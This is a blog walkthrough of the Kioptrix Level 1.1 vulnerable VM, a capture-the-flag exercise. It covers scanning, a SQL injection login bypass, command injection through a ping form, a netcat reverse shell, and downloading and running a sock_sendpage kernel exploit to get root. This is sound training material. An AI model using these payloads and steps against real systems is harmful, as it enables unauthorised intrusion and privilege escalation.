Kioptrix Level 1.1 (#2) Walkthrough

This is the second VM in the Kioptrix series of vulnerable VMs. You can get it from VulnHub.


First, let’s find the host:

root ~ # netdiscover -i eth1 -r
 IP At MAC Address Count Len MAC Vendor / Hostname 
 -------------------------------------------------------------------------- 00:50:56:c0:00:01 1 60 VMware, Inc. 00:0c:29:53:19:4c 1 60 VMware, Inc.

Now let’s nmap scan it (I’ve cut out a bunch of irrelevant lines):

root ~ # nmap -sV -O
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
OS details: Linux 2.6.9 - 2.6.30


Doing a bit of research shows that OpenSSH 3.9p1 & Apache 2.0.52 were released in 2004 and CUPS 1.1 was released in 2000. This VM released in 2011. I might need to look for vulnerabilities in some of these services. For now, I’m going to check the website. It appears to just be a login page:

Port 443 is also open but the HTTPS page is exactly the same. First, I’ll run dirb to see if there are any other easy to find pages that might be of interest:

root ~ # dirb
 ---- Scanning URL: ----
 + (CODE:403|SIZE:286)
 + (CODE:200|SIZE:667)
 + (CODE:403|SIZE:283)

Nothing good. The /manual/ directory is just the Apache manual.


The next thing that comes to mind is to try some SQL Injection. After spending some on this, I finally found something that worked. The username can be anything while using this for the password:

' or '1'='1

That takes you to this “Basic Administrative Web Console” that lets you ping another machine on the network.

This has ‘command injection’ written all over it… I’ll end the ping command with a semicolon (;) and do something simple like pwd to see if this works.

Great! Now, using PentestMonkey’s Reverse Shell Cheat Sheet, I’ll try to get a reverse shell strait from Bash:

root ~ # nc -lvp 1337
listening on [any] 1337 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 32769
bash: no job control in this shell

Privilege Escalation

That was easy… Let’s see if we can get root privileges. First, I get the kernel version.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Now, using my favorite place to check for kernel exploits, I just used Ctrl+F to search for “2.6.9” and found several possibilities. I’ll spare all the trials & errors I went through to find one that worked. Go to the “sock_sendpage” exploit & follow the link to Exploit-db. There’s a link there to download wunderbar_emporium.tgz. I downloaded this to my Kali VM and started a web server to transfer it to the Kioptrix 2 VM.

root ~ # wget
2018-01-09 21:32:41 (384 KB/s) - ‘9435.tgz’ saved [3492015/3492015]

root ~ # python -m SimpleHTTPServer 80
Serving HTTP on port 80 ...

Now I can download & run it on the Kioptrix 2 VM.

bash-3.00$ cd /tmp
bash-3.00$ wget
           => `wunderbar_emporium.tgz'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,492,015 (3.3M) [application/x-gtar-compressed]

22:23:57 (84.85 MB/s) - `wunderbar_emporium.tgz' saved [3492015/3492015]

bash-3.00$ ls
bash-3.00$ tar zxf wunderbar_emporium.tgz
bash-3.00$ ls
bash-3.00$ cd wunderbar_emporium    
bash-3.00$ ls
bash-3.00$ chmod +x 
bash-3.00$ ls
bash-3.00$ ./ 
sh: mplayer: command not found
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Great success!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.